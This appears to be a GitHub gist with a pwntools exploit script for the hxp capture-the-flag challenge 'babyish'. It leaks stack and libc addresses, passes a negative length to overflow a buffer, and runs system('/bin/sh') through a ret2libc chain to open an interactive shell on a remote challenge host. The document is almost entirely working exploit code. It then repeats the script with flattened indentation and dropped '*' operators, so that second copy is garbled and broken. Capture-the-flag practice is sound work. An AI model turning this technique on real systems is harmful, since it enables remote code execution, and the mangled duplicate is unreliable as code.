bmphx2/babyish_hxp_CTF.py Secret

## babyish_hxp_CTF.py
#!/usr/bin/python

from pwn import *

LOCAL = False

def pwn():
	log.info("babyish - mphx2 @ TheGoonies\n\n")

	target.recvuntil("Enter username: ")
	target.sendline("A"*15)
	leak = target.recvuntil("Enter length: ")
	stack = u32(leak[20:24])
	libc = u32(leak[28:32])

	log.info("leaking libc  ...  %#x\n", libc)
	log.info("leaking stack ...  %#x\n", stack)

	libc_system = libc - 0x2565b
	libc_sh = libc + 0xfcead

	log.info("system   @ libc %#x\n", libc_system)
	log.info("/bin/sh  @ libc %#x\n", libc_sh)

	log.info("pwning...")
	target.sendline("-1")
	target.recvuntil("Enter string (length 4294967295): ")
	target.sendline("D"*80+p32(stack)+"A"*12+p32(libc_system)+"BBBB"+p32(libc_sh))

	log.info("spawning /bin/sh")

	target.interactive()

def main():
	global target
	if LOCAL:
		target = process("./vuln")
	else:
		target = remote("35.198.98.140",45067)
	pwn()

if __name__ == "__main__":
    main()
	#!/usr/bin/python

	from pwn import *

	LOCAL = False

	def pwn():
	log.info("babyish - mphx2 @ TheGoonies\n\n")

	target.recvuntil("Enter username: ")
	target.sendline("A"*15)
	leak = target.recvuntil("Enter length: ")
	stack = u32(leak[20:24])
	libc = u32(leak[28:32])

	log.info("leaking libc ... %#x\n", libc)
	log.info("leaking stack ... %#x\n", stack)

	libc_system = libc - 0x2565b
	libc_sh = libc + 0xfcead

	log.info("system @ libc %#x\n", libc_system)
	log.info("/bin/sh @ libc %#x\n", libc_sh)

	log.info("pwning...")
	target.sendline("-1")
	target.recvuntil("Enter string (length 4294967295): ")
	target.sendline("D"80+p32(stack)+"A"12+p32(libc_system)+"BBBB"+p32(libc_sh))

	log.info("spawning /bin/sh")

	target.interactive()

	def main():
	global target
	if LOCAL:
	target = process("./vuln")
	else:
	target = remote("35.198.98.140",45067)
	pwn()

	if __name__ == "__main__":
	main()